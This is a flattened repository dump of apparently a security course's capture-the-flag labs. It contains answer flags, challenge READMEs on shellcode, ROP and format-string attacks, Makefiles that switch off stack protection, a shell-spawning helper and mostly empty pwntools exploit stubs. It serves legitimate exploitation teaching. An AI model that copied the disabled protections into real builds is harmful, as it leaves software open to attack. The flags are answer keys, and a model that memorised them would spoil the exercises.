-------------------------------------------------------------------------------- 1 | cand{pop_RDI_pop_RSI_pop_RDX_RET_to_pop_corn} 2 | -------------------------------------------------------------------------------- /run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | docker run -it --rm -v `pwd`/workdir:/home/labs/workdir cand:latest 3 | -------------------------------------------------------------------------------- /src/week1/challenges/level9/README: -------------------------------------------------------------------------------- 1 | Not a complex integer calculation is in the program. 2 | -------------------------------------------------------------------------------- /src/week3/challenges/alphanumeric-shellcode-32/flag: -------------------------------------------------------------------------------- 1 | cand{T3ll_m3_wh4t_y0ur_5h311c0d3_15?} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/short-shellcode-64/flag: -------------------------------------------------------------------------------- 1 | cand{y0u_mAy_ne3d_n0t_m0rE_tHaN_3_bytEs} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-32/.gitignore: -------------------------------------------------------------------------------- 1 | stack-ovfl-32 2 | stack-ovfl-64 3 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-no-argv-32/info.cfg: -------------------------------------------------------------------------------- 1 | stack-ovfl-sc-32, flag-32 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-use-envp-32/.gitignore: -------------------------------------------------------------------------------- 1 | stack-ovfl-32 2 | stack-ovfl-64 3 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-where-32-2/.gitignore: -------------------------------------------------------------------------------- 1 | stack-ovfl-32 2 | stack-ovfl-64 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-6-64/README: -------------------------------------------------------------------------------- 1 | NO pop rdx. 2 | Can you set the 3rd arg of execve? 3 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-no-binary-pie-64/flag: -------------------------------------------------------------------------------- 1 | cand{y0u_C4n_l3Ak_B1n4rY_w1tH_SR_and_AR} 2 | -------------------------------------------------------------------------------- /src/week7/challenges/get-flag-without-write-nor-exec/flag: -------------------------------------------------------------------------------- 1 | cand{l3aK_th3_flAg_v1a_3xit} 2 | -------------------------------------------------------------------------------- /src/week1/challenges/level8/README: -------------------------------------------------------------------------------- 1 | Three four game. The program adds integers for many times! 2 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level9/README: -------------------------------------------------------------------------------- 1 | main() returns weirdly. Can you exploit this program? 2 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-no-argv-32/.gitignore: -------------------------------------------------------------------------------- 1 | stack-ovfl-32 2 | stack-ovfl-64 3 | -------------------------------------------------------------------------------- /src/week4/challenges/1-dep-2/README: -------------------------------------------------------------------------------- 1 | NO system() but you will call system() on this system... 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-3-32/info.cfg: -------------------------------------------------------------------------------- 1 | rop-nosymlink-32, flag-32 2 | rop-nosymlink-64, flag-64 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-3-64/info.cfg: -------------------------------------------------------------------------------- 1 | rop-nosymlink-32, flag-32 2 | rop-nosymlink-64, flag-64 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-32/README: -------------------------------------------------------------------------------- 1 | You cannot use symlink. 2 | How can you read the flag? 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-32/info.cfg: -------------------------------------------------------------------------------- 1 | rop-nosymlink-32, flag-32 2 | rop-nosymlink-64, flag-64 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-64/README: -------------------------------------------------------------------------------- 1 | You cannot use symlink. 2 | How can you read the flag? 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-64/info.cfg: -------------------------------------------------------------------------------- 1 | rop-nosymlink-32, flag-32 2 | rop-nosymlink-64, flag-64 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-6-64/info.cfg: -------------------------------------------------------------------------------- 1 | rop-nosymlink-32, flag-32 2 | rop-nosymlink-64, flag-64 3 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-32/flag: -------------------------------------------------------------------------------- 1 | cand{leaked_by_AR_hijacked_by_AW_pwned_by_printf()} 2 | -------------------------------------------------------------------------------- /src/week7/challenges/caffeinated-tocttou/flag: -------------------------------------------------------------------------------- 1 | cand{ExPlOiTiNG_a_rAc3_c0nD1tIoN_VulN_is_EASY} 2 | -------------------------------------------------------------------------------- /src/week7/challenges/deprivileged/flag: -------------------------------------------------------------------------------- 1 | cand{0p3nEd_f1le_c4n_b3_r3aD_ev3N_4ft3r_d3pr1viLEg3} 2 | -------------------------------------------------------------------------------- /src/week3/challenges/ascii-shellcode-64/.gitignore: -------------------------------------------------------------------------------- 1 | shellcode-64 2 | x64-shellcode 3 | *.bin 4 | *.o 5 | -------------------------------------------------------------------------------- /src/week7/challenges/guess-my-random/README: -------------------------------------------------------------------------------- 1 | Don't ever guess the random. Exploit the vulnerability! 2 | -------------------------------------------------------------------------------- /src/week7/challenges/where-to-jump/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | -------------------------------------------------------------------------------- /src/week7/challenges/deprivileged/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | 6 | -------------------------------------------------------------------------------- /src/week3/challenges/alphanumeric-shellcode-32/.gitignore: -------------------------------------------------------------------------------- 1 | shellcode-32 2 | x86-shellcode 3 | *.bin 4 | *.o 5 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-2-32/flag: -------------------------------------------------------------------------------- 1 | cand{N0_M4tt3r_H0w_FAR_th3_t4rg3t_iS_ouR_printf()_c4n_l0c4t3_th4t} 2 | -------------------------------------------------------------------------------- /src/week4/challenges/3-stack-cookie-1/README: -------------------------------------------------------------------------------- 1 | A simple stack cookie. You have already known how to break this... 2 | -------------------------------------------------------------------------------- /src/week4/challenges/5-stack-cookie-3/README: -------------------------------------------------------------------------------- 1 | Please break GCC ProPolice. I know beavers knew how to crack this. 2 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-32/info.cfg: -------------------------------------------------------------------------------- 1 | rop-1-32, flag-1 2 | rop-2-64, flag-2 3 | rop-3-32, flag-3 4 | rop-4-64, flag-4 5 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-64/info.cfg: -------------------------------------------------------------------------------- 1 | rop-1-32, flag-1 2 | rop-2-64, flag-2 3 | rop-3-32, flag-3 4 | rop-4-64, flag-4 5 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-5-32/sh.c: -------------------------------------------------------------------------------- 1 | int main() { 2 | setregid(getegid(), getegid()); 3 | execve("/bin/sh", 0, 0); 4 | } 5 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-5-64/sh.c: -------------------------------------------------------------------------------- 1 | int main() { 2 | setregid(getegid(), getegid()); 3 | execve("/bin/sh", 0, 0); 4 | } 5 | -------------------------------------------------------------------------------- /src/week7/challenges/2048/2048: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week7/challenges/2048/2048 -------------------------------------------------------------------------------- /src/week7/challenges/get-flag-without-write-nor-exec/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /src/week1/challenges/level8/level8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week1/challenges/level8/level8 -------------------------------------------------------------------------------- /src/week1/challenges/level9/level9: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week1/challenges/level9/level9 -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-32/README: -------------------------------------------------------------------------------- 1 | The program wipes envp. Can you put your shellcode on the stack and execute that? 2 | -------------------------------------------------------------------------------- /src/week7/challenges/tocttou/Makefile: -------------------------------------------------------------------------------- 1 | all: tocttou 2 | 3 | tocttou: tocttou.c 4 | $(CC) -o $@ $< 5 | 6 | clean: 7 | rm -rf tocttou 8 | -------------------------------------------------------------------------------- /src/week7/challenges/intquiz/intquiz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week7/challenges/intquiz/intquiz -------------------------------------------------------------------------------- /src/week7/challenges/tocttou/tocttou: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week7/challenges/tocttou/tocttou -------------------------------------------------------------------------------- /src/week4/challenges/0-dep-1/README: -------------------------------------------------------------------------------- 1 | You cannot execute any code in the stack, heap, etc. 2 | You may execute existing code. Then what will you do? 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-1-32/README: -------------------------------------------------------------------------------- 1 | Practice return-oriented Programming! 2 | Call: 3 | setregid(50000,50000); 4 | execve("/bin/sh", 0, 0); 5 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-1-32/exploit.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week5/challenges/rop-1-32/exploit.txt -------------------------------------------------------------------------------- /src/week5/challenges/rop-1-64/README: -------------------------------------------------------------------------------- 1 | Practice return-oriented Programming! 2 | Call: 3 | setregid(50000,50000); 4 | execve("/bin/sh", 0, 0); 5 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-1-64/exploit.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week5/challenges/rop-1-64/exploit.txt -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-32/exploit.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week5/challenges/rop-2-32/exploit.txt -------------------------------------------------------------------------------- /src/week5/challenges/rop-5-64/exploit.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week5/challenges/rop-5-64/exploit.txt -------------------------------------------------------------------------------- /src/week5/challenges/rop-6-64/exploit-64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./rop-6-64") 6 | p.interactive() 7 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level6/bof-level6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week2/challenges/bof-level6/bof-level6 -------------------------------------------------------------------------------- /src/week2/challenges/bof-level8/bof-level8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week2/challenges/bof-level8/bof-level8 -------------------------------------------------------------------------------- /src/week3/challenges/ascii-shellcode-64/README: -------------------------------------------------------------------------------- 1 | Can you write an amd64 shellcode without using non-ASCII characters 2 | (i.e., charcodes from 0 upto 127)? 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-64/exploit-64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./rop-4-64") 6 | 7 | p.interactive() 8 | -------------------------------------------------------------------------------- /src/week7/challenges/run-command/run-command: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week7/challenges/run-command/run-command -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-no-argv-32/README: -------------------------------------------------------------------------------- 1 | The program wipes out both envp and argv. Can you put your shellcode on the 2 | stack and run it? 3 | -------------------------------------------------------------------------------- /src/week6/challenges/aw-1/Makefile: -------------------------------------------------------------------------------- 1 | all: aw-1 2 | 3 | aw-1: aw-1.c 4 | cc -o $@ $< -m64 -fstack-protector -DBUFSIZE=128 -O0 5 | 6 | clean: 7 | rm -rf aw-1 8 | -------------------------------------------------------------------------------- /src/week6/challenges/aw-2/Makefile: -------------------------------------------------------------------------------- 1 | all: aw-2 2 | 3 | aw-2: aw-2.c 4 | cc -o $@ $< -m64 -fstack-protector -DBUFSIZE=128 -O0 5 | 6 | clean: 7 | rm -rf aw-2 8 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-1-32/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./fs-read-1-32") 6 | 7 | p.interactive() 8 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-1-64/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('./fs-read-1-64') 6 | 7 | p.interactive() 8 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-2-32/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('./fs-read-2-32') 6 | 7 | p.interactive() 8 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-2-64/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('fs-read-2-64') 6 | 7 | p.interactive() 8 | -------------------------------------------------------------------------------- /src/week7/challenges/deprivileged/deprivileged: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week7/challenges/deprivileged/deprivileged -------------------------------------------------------------------------------- /src/week7/challenges/guess-passwd/Makefile: -------------------------------------------------------------------------------- 1 | all: guess-passwd 2 | 3 | guess-passwd: guess-passwd.c 4 | $(CC) -o $@ $< 5 | 6 | clean: 7 | rm -rf guess-passwd 8 | -------------------------------------------------------------------------------- /src/week7/challenges/guess-passwd/guess-passwd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week7/challenges/guess-passwd/guess-passwd -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-sc-32/README: -------------------------------------------------------------------------------- 1 | Can you put your shellcode on the buffer and run that by exploiting 2 | a buffer overflow vulnerability in the program? 3 | -------------------------------------------------------------------------------- /src/week4/challenges/6-stack-cookie-4/README: -------------------------------------------------------------------------------- 1 | OMG stack cookie is in place and I don't know what the value is. 2 | Could you help me with overwriting the ret addr? 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-32/README: -------------------------------------------------------------------------------- 1 | Call: 2 | open("flag", 0, 0); 3 | read(3, global_variable_addr, size); 4 | write(1, global_variable_addr, size); 5 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-64/README: -------------------------------------------------------------------------------- 1 | Call: 2 | open("flag", 0, 0); 3 | read(3, global_variable_addr, size); 4 | write(1, global_variable_addr, size); 5 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-32/exploit-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./rop-nosymlink-32") 6 | 7 | p.interactive() 8 | -------------------------------------------------------------------------------- /src/week6/challenges/ar-2/Makefile: -------------------------------------------------------------------------------- 1 | all: ar-2 2 | 3 | ar-2: ar-2.c 4 | cc -o $@ $< -m64 -fno-stack-protector -DBUFSIZE=128 -O0 5 | 6 | clean: 7 | rm -rf ar-2 8 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-read-32/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('fs-arbt-read-32') 6 | 7 | p.interactive() 8 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-read-64/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('./fs-arbt-read-64') 6 | 7 | p.interactive() 8 | -------------------------------------------------------------------------------- /src/week6/challenges/sr-1/Makefile: -------------------------------------------------------------------------------- 1 | all: sr-1 2 | 3 | sr-1: sr-1.c 4 | cc -o $@ $< -m64 -fno-stack-protector -DBUFSIZE=128 -O0 5 | 6 | clean: 7 | rm -rf sr-1 8 | -------------------------------------------------------------------------------- /src/week7/challenges/where-to-jump/where-to-jump: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week7/challenges/where-to-jump/where-to-jump -------------------------------------------------------------------------------- /src/week3/challenges/shellcode-template/shellcode.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week3/challenges/shellcode-template/shellcode.o -------------------------------------------------------------------------------- /src/week3/challenges/shellcode-template/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week3/challenges/shellcode-template/shellcode.bin -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-pie-64/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | p = process('fs-code-exec-pie-64', env=env) 5 | 6 | p.interactive() 7 | -------------------------------------------------------------------------------- /src/week7/challenges/guess-my-random/guess-my-random: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week7/challenges/guess-my-random/guess-my-random -------------------------------------------------------------------------------- /src/week7/challenges/run-command/Makefile: -------------------------------------------------------------------------------- 1 | all: run-command 2 | 3 | run-command: run-command.c 4 | gcc -o $@ $< -fno-stack-protector -m64 5 | 6 | clean: 7 | rm run-command 8 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level6/exploit.txt: -------------------------------------------------------------------------------- 1 | :@:@:@:@:@:@:@:@:@:@:@:@:@:@:@:@ -------------------------------------------------------------------------------- /src/week3/challenges/short-shellcode-32/README: -------------------------------------------------------------------------------- 1 | Can you write a non-zero shellcode without using more than 12 bytes? 2 | The program runs setregid(getegid(), getegid()) for you. 3 | -------------------------------------------------------------------------------- /src/week4/challenges/0-dep-1/Makefile: -------------------------------------------------------------------------------- 1 | all: dep-1 2 | 3 | dep-1: dep-1.c 4 | cc -o $@ $< -m32 -fno-stack-protector -DBUFSIZE=128 -O0 5 | 6 | clean: 7 | rm -rf dep-1 dep-2 dep-3 8 | -------------------------------------------------------------------------------- /src/week4/challenges/1-dep-2/Makefile: -------------------------------------------------------------------------------- 1 | all: dep-2 2 | 3 | dep-2: dep-2.c 4 | cc -o $@ $< -m32 -fno-stack-protector -DBUFSIZE=128 -O0 5 | 6 | clean: 7 | rm -rf dep-1 dep-2 dep-3 8 | -------------------------------------------------------------------------------- /src/week7/challenges/one-format-string/one-format-string: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week7/challenges/one-format-string/one-format-string -------------------------------------------------------------------------------- /src/week5/challenges/rop-5-32/exploit-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./rop-5-32") 6 | 7 | e = ELF('/lib32/libc.so.6') 8 | p.interactive() 9 | -------------------------------------------------------------------------------- /src/week7/challenges/deprivileged/Makefile: -------------------------------------------------------------------------------- 1 | all: deprivileged 2 | 3 | deprivileged: deprivileged.c 4 | gcc -o $@ $< -fno-stack-protector -no-pie 5 | 6 | clean: 7 | rm deprivileged 8 | -------------------------------------------------------------------------------- /src/week3/challenges/short-shellcode-64/README: -------------------------------------------------------------------------------- 1 | Can you write a non-zero shellcode without using more than 12 bytes, in amd64? 2 | The program runs setregid(getegid(), getegid()) for you. 3 | -------------------------------------------------------------------------------- /src/week4/challenges/2-dep-3/Makefile: -------------------------------------------------------------------------------- 1 | all: dep-3 2 | 3 | dep-3: dep-3.c 4 | cc -o $@ $< -m32 -DBUFSIZE=128 -O0 -static -fno-stack-protector 5 | 6 | clean: 7 | rm -rf dep-1 dep-2 dep-3 8 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-1-64/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-1-64 2 | 3 | rop-1-64: rop-1-64.c 4 | cc -o $@ $< -m64 -fno-stack-protector -DBUFSIZE=128 -O0 -no-pie 5 | 6 | clean: 7 | rm -rf rop-1-64 8 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-3-32/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-3-32 2 | 3 | rop-3-32: rop-3-32.c 4 | cc -o $@ $< -m32 -fno-stack-protector -DBUFSIZE=128 -O0 -no-pie 5 | 6 | clean: 7 | rm -rf rop-3-32 8 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-32/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-4-32 2 | 3 | rop-4-32: rop-4-32.c 4 | cc -o $@ $< -m32 -fno-stack-protector -DBUFSIZE=128 -O0 -no-pie 5 | 6 | clean: 7 | rm -rf rop-4-32 8 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-5-32/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-5-32 2 | 3 | rop-5-32: rop-5-32.c 4 | cc -o $@ $< -m32 -fno-stack-protector -DBUFSIZE=128 -O0 -no-pie 5 | 6 | clean: 7 | rm -rf rop-5-32 8 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-5-64/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-5-64 2 | 3 | rop-5-64: rop-5-64.c 4 | cc -o $@ $< -m64 -fno-stack-protector -DBUFSIZE=128 -O0 -no-pie 5 | 6 | clean: 7 | rm -rf rop-5-64 8 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-6-64/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-6-64 2 | 3 | rop-6-64: rop-6-64.c 4 | cc -o $@ $< -m64 -fno-stack-protector -DBUFSIZE=128 -O0 -no-pie 5 | 6 | clean: 7 | rm -rf rop-6-64 8 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-7-64/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-7-64 2 | 3 | rop-7-64: rop-7-64.c 4 | cc -o $@ $< -m64 -fno-stack-protector -DBUFSIZE=128 -O0 -no-pie 5 | 6 | clean: 7 | rm -rf rop-7-64 8 | -------------------------------------------------------------------------------- /src/week6/challenges/sr-1/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | offset_to_libc_start_main = 0xe8 - 0x30 6 | 7 | p = process("./sr-1") 8 | p.interactive() 9 | -------------------------------------------------------------------------------- /src/week7/challenges/caffeinated-tocttou/caffeinated-tocttou: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week7/challenges/caffeinated-tocttou/caffeinated-tocttou -------------------------------------------------------------------------------- /src/week3/challenges/shellcode-32/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: shellcode-32 4 | 5 | shellcode-32: shellcode.c 6 | $(CC) -m32 -o $@ $< 7 | 8 | clean: 9 | @rm -rf shellcode-32 10 | -------------------------------------------------------------------------------- /src/week3/challenges/shellcode-64/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: shellcode-64 4 | 5 | shellcode-64: shellcode.c 6 | $(CC) -m64 -o $@ $< 7 | 8 | clean: 9 | @rm -rf shellcode-64 10 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-3-64/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-3-64 2 | 3 | rop-3-64: rop-3-64.c 4 | cc -o $@ $< -m64 -fno-stack-protector -DBUFSIZE=128 -O0 -no-pie 5 | 6 | 7 | clean: 8 | rm -rf rop-3-64 9 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-64/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-4-64 2 | 3 | 4 | rop-4-64: rop-4-64.c 5 | cc -o $@ $< -m64 -fno-stack-protector -DBUFSIZE=128 -O0 -no-pie 6 | 7 | clean: 8 | rm -rf rop-4-64 9 | -------------------------------------------------------------------------------- /src/week6/challenges/ar-2/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./ar-2") 6 | 7 | printf_got = p.elf.got['printf'] 8 | 9 | p.interactive() 10 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-1-32/Makefile: -------------------------------------------------------------------------------- 1 | all: fs-read-1-32 2 | 3 | fs-read-1-32: fs-read-1-32.c 4 | cc -o $@ $< -m32 -DBUFSIZE=128 -O0 -no-pie -g 5 | 6 | clean: 7 | rm -rf fs-read-1-32 8 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-1-64/Makefile: -------------------------------------------------------------------------------- 1 | all: fs-read-1-64 2 | 3 | fs-read-1-64: fs-read-1-64.c 4 | cc -o $@ $< -m64 -DBUFSIZE=128 -O0 -no-pie -g 5 | 6 | clean: 7 | rm -rf fs-read-1-64 8 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-2-32/Makefile: -------------------------------------------------------------------------------- 1 | all: fs-read-2-32 2 | 3 | fs-read-2-32: fs-read-2-32.c 4 | cc -o $@ $< -m32 -DBUFSIZE=128 -O0 -no-pie -g 5 | 6 | clean: 7 | rm -rf fs-read-2-32 8 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-2-64/Makefile: -------------------------------------------------------------------------------- 1 | all: fs-read-2-64 2 | 3 | fs-read-2-64: fs-read-2-64.c 4 | cc -o $@ $< -m64 -DBUFSIZE=128 -O0 -no-pie -g 5 | 6 | clean: 7 | rm -rf fs-read-2-64 8 | -------------------------------------------------------------------------------- /src/week7/challenges/caffeinated-tocttou/Makefile: -------------------------------------------------------------------------------- 1 | all: caffeinated-tocttou 2 | 3 | caffeinated-tocttou: caffeinated-tocttou.c 4 | $(CC) -o $@ $< 5 | 6 | clean: 7 | rm -rf caffeinated-tocttou 8 | -------------------------------------------------------------------------------- /src/week7/challenges/guess-my-random/Makefile: -------------------------------------------------------------------------------- 1 | all: guess-my-random 2 | 3 | guess-my-random: guess-my-random.c 4 | gcc -o $@ $< -fno-stack-protector -m32 5 | 6 | clean: 7 | rm guess-my-random 8 | -------------------------------------------------------------------------------- /src/week7/challenges/where-to-jump/Makefile: -------------------------------------------------------------------------------- 1 | all: where-to-jump 2 | 3 | where-to-jump: where-to-jump.c 4 | clang -o $@ $< -fstack-protector-strong -m32 5 | 6 | clean: 7 | rm where-to-jump 8 | -------------------------------------------------------------------------------- /src/week3/challenges/alphanumeric-shellcode-32/README: -------------------------------------------------------------------------------- 1 | Use only alphanumeric characters to write your x86 shellcode: 2 | the charset is 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz 3 | -------------------------------------------------------------------------------- /src/week3/challenges/ascii-shellcode-64/Makefile: -------------------------------------------------------------------------------- 1 | all: ascii-shellcode-64 2 | CC=clang 3 | ascii-shellcode-64: ascii-shellcode.c 4 | $(CC) -o $@ $< -m64 5 | 6 | clean: 7 | rm -rf ascii-shellcode-64 8 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-use-envp-32/README: -------------------------------------------------------------------------------- 1 | Can you put your shellcode as one of the environmental variables 2 | to put that on the stack and execute it via the vulnerability in the program? 3 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-5-64/exploit-64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./rop-5-64") 6 | 7 | e = ELF('/lib/x86_64-linux-gnu/libc.so.6') 8 | p.interactive() 9 | -------------------------------------------------------------------------------- /src/week7/challenges/intquiz/Makefile: -------------------------------------------------------------------------------- 1 | all: intquiz 2 | 3 | some-integer-quizzes: intquiz.c 4 | $(CC) -o $@ $< -z relro -z now -D_FORTIFY_SOURCE=2 -pie -fPIE -g 5 | 6 | clean: 7 | rm -rf ./intquiz 8 | -------------------------------------------------------------------------------- /src/week7/challenges/one-format-string/README: -------------------------------------------------------------------------------- 1 | Please create a buffer overflow vulnerability by exploiting 2 | a format string vulnerability in the program. 3 | You need to bypass stack canary, too. 4 | -------------------------------------------------------------------------------- /src/week7/challenges/run-command/README: -------------------------------------------------------------------------------- 1 | https://www.pair.com/support/kb/paircloud-tutorial-using-the-shell-part-1/ 2 | https://superuser.com/questions/935374/difference-between-and-in-shell-script 3 | -------------------------------------------------------------------------------- /src/week1/Makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) 12 | -------------------------------------------------------------------------------- /src/week2/Makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) 12 | -------------------------------------------------------------------------------- /src/week3/Makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) 12 | -------------------------------------------------------------------------------- /src/week4/Makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) 12 | -------------------------------------------------------------------------------- /src/week5/Makefile: 